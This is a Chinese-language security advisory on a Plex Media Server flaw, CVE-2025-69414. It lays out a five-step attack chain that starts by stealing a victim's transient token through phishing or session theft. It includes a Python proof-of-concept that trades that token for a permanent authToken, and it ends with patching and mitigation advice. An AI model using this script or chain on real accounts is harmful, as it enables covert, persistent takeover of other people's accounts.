CVE-2025-69414 Plex Media Server 永久访问令牌泄露漏洞

漏洞信息

漏洞编号

CVE-2025-69414

漏洞类型

认证绕过/令牌泄露

CVSS评分

8.5 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Plex Media Server (PMS)

漏洞概述

CVE-2025-69414是Plex Media Server（PMS）中的一个高危安全漏洞，CVSS评分达到8.5分。该漏洞存在于PMS 1.42.2.10156及之前版本中，允许攻击者通过使用临时访问令牌调用/myplex/account接口来获取用户的永久访问令牌。永久访问令牌具有长期有效性，攻击者获取后可长期维持对受害者Plex账户的访问权限，包括查看媒体库、播放记录、账户信息等敏感数据。此漏洞的利用门槛相对较低，只需要一个有效的临时访问令牌即可发起攻击，无需特殊权限或用户交互。攻击者可利用获取的永久令牌进行横向移动，进一步访问用户关联的其他服务。

技术细节

该漏洞的核心问题在于Plex Media Server的/myplex/account接口存在认证验证缺陷。当用户登录Plex账户时，系统会首先分配一个临时的访问令牌（transient token），该令牌具有时效性，通常在短时间内过期。正常情况下，永久访问令牌的获取应该需要完整的身份验证流程。然而，漏洞使得攻击者可以使用这个临时的短期令牌直接调用/myplex/account接口，系统错误地返回了与该账户绑定的永久访问令牌。攻击流程为：首先获取目标的临时令牌（可通过社工、钓鱼或窃取session等方式），然后构造HTTP请求到Plex服务器的/myplex/account端点，在请求头中携带临时令牌，系统响应中即包含永久令牌。获取永久令牌后，攻击者可以在令牌有效期内无限次访问受害者账户，且不易被察觉。

攻击链分析

STEP 1

步骤1: 获取临时访问令牌

攻击者通过钓鱼、社会工程学攻击、窃取session或其他方式获取受害者Plex账户的临时访问令牌（transient token）。临时令牌具有短期时效性，通常通过正常的登录流程或API调用获取。

STEP 2

步骤2: 构造恶意请求

攻击者构造HTTP GET请求到Plex服务器的/myplex/account端点，在Authorization请求头中携带获取到的临时令牌。请求头需要包含X-Plex-Product、X-Plex-Version等标识信息以模拟正常客户端请求。

STEP 3

步骤3: 发送漏洞利用请求

攻击者向https://plex.tv/myplex/account发送构造好的请求。由于服务端对/myplex/account接口的认证验证存在缺陷，系统错误地接受了临时令牌并返回了与该账户绑定的永久访问令牌（authToken）。

STEP 4

步骤4: 提取并存储永久令牌

攻击者从响应JSON中提取authToken字段的值。永久令牌与账户永久绑定，不会在短时间内过期。攻击者将令牌保存以供后续使用。

STEP 5

步骤5: 持久化访问受害者账户

攻击者使用获取的永久令牌通过Plex API访问受害者账户，可查看媒体库、播放记录、个人信息等敏感数据。由于令牌永久有效，攻击者可以长期维持访问权限而不被察觉。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# CVE-2025-69414 PoC - Plex Media Server Permanent Access Token Leak
# Description: Exploit the /myplex/account endpoint to retrieve permanent token using transient token

def exploit_plex_token_leak(plex_server_url, transient_token):
    """
    Exploit CVE-2025-69414 to obtain permanent access token
    
    Args:
        plex_server_url: Target Plex Media Server URL (e.g., 'https://plex.tv')
        transient_token: Valid transient/short-lived access token
    
    Returns:
        Permanent access token if exploit successful, None otherwise
    """
    headers = {
        'X-Plex-Product': 'Plex API',
        'X-Plex-Version': '1.0',
        'X-Plex-Client-Identifier': 'CVE-2025-69414-POC',
        'Authorization': f'Bearer {transient_token}'
    }
    
    try:
        # Target endpoint that leaks permanent token
        response = requests.get(
            f'{plex_server_url}/myplex/account',
            headers=headers,
            timeout=10
        )
        
        if response.status_code == 200:
            data = response.json()
            # Extract permanent token from response
            if 'user' in data and 'authToken' in data['user']:
                permanent_token = data['user']['authToken']
                print(f'[+] Permanent Token Obtained: {permanent_token}')
                return permanent_token
        
        print('[-] Exploit failed - check token or endpoint')
        return None
        
    except requests.exceptions.RequestException as e:
        print(f'[-] Request error: {e}')
        return None

# Example usage
if __name__ == '__main__':
    target = 'https://plex.tv'
    # Replace with actual transient token obtained through other means
    transient_token = 'TRANSIENT_TOKEN_HERE'
    
    permanent_token = exploit_plex_token_leak(target, transient_token)
    if permanent_token:
        print('[+] Exploit successful - use token for persistent access')

影响范围

Plex Media Server <= 1.42.2.10156

防御指南

临时缓解措施

目前官方可能已发布安全更新修复该漏洞。建议用户立即升级Plex Media Server到最新版本。同时可采取以下临时措施：1）启用Plex账户的双因素认证；2）定期检查账户的登录历史和活动记录；3）如果发现异常访问，立即撤销会话并更换密码；4）考虑限制Plex服务的网络暴露范围，仅允许受信任的网络访问管理界面。